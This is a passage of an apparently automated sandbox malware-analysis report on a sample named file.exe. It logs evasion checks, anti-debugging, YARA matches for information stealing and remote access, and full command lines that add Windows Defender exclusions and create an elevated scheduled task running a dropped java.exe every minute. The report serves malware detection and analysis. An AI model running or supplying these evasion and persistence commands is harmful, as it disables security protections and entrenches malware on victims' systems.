                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\java.exe; Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                      Source: file.exe, java.exe.0.dr; Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\file.exe; Memory allocated: C70000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exe; Memory allocated: 1A990000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exe; Memory allocated: A40000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exe; Memory allocated: 1A610000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exe; Memory allocated: 1030000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exe; Memory allocated: 1ADE0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exe; Memory allocated: 840000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exe; Memory allocated: 1A2E0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exe; Memory allocated: E50000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\java.exe; Memory allocated: 1A9C0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\file.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\java.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\file.exe; Window / User API: threadDelayed 766
                      Source: C:\Users\user\Desktop\file.exe; Window / User API: threadDelayed 9081
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6041
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3751
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7809
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 1689
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 5819
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3774
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 7064
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2471
                      Source: C:\Users\user\Desktop\file.exe TID: 1016; Thread sleep time: -35971150943733603s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3404; Thread sleep time: -10145709240540247s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5260; Thread sleep count: 7809 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1016; Thread sleep count: 1689 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5648; Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6532; Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\System32\svchost.exe TID: 380; Thread sleep time: -30000s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 880; Thread sleep count: 7064 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4436; Thread sleep count: 2471 > 30
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6748; Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\java.exe TID: 5768; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\java.exe TID: 6780; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\java.exe TID: 1112; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\java.exe TID: 4892; Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\svchost.exe; File opened: PhysicalDrive0
                      Source: C:\Users\user\Desktop\file.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                      Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
                      Source: C:\Users\user\Desktop\file.exe; File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exe; File Volume queried: C:\ FullSizeInformation
                      Source: java.exe.0.dr; Binary or memory string: vmware
                      Source: svchost.exe, 0000000C.00000002.3404879630.0000014D50A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.3403481208.0000014D4B42B000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                      Source: file.exe, 00000000.00000002.3417338709.000000001B833000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB
                      Source: C:\Users\user\Desktop\file.exe; Process information queried: ProcessInformation

                      Anti Debugging

                      Source: C:\Users\user\Desktop\file.exe; Code function: 0_2_00007FFD34817A8B CheckRemoteDebuggerPresent,0_2_00007FFD34817A8B
                      Source: C:\Users\user\Desktop\file.exe; Process queried: DebugPort
                      Source: C:\Users\user\Desktop\file.exe; Process token adjusted: Debug
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\java.exe; Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\file.exe; Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                      Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\java.exe'
                      Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                      Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'java.exe'
                      Source: C:\Users\user\Desktop\file.exe; Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "java" /tr "C:\Users\user\AppData\Roaming\java.exe"
                      Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                      Source: C:\Users\user\Desktop\file.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeQueries volume information: C:\Users\user\AppData\Roaming\java.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeQueries volume information: C:\Users\user\AppData\Roaming\java.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeQueries volume information: C:\Users\user\AppData\Roaming\java.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\java.exeQueries volume information: C:\Users\user\AppData\Roaming\java.exe VolumeInformation
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: file.exe, 00000000.00000002.3417338709.000000001B8D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information

                      Source: Yara match | File source: file.exe, type: SAMPLE
                      Source: Yara match | File source: 0.2.file.exe.2a61cd8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.0.file.exe.630000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.3408817500.0000000002991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000000.2125481379.0000000000632000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3414135593.00000000129A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.3408817500.0000000002A5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: file.exe PID: 2968, type: MEMORYSTR
                      Source: Yara match | File source: C:\Users\user\AppData\Roaming\java.exe, type: DROPPED

                      Remote Access Functionality

                      Source: Yara match | File source: file.exe, type: SAMPLE
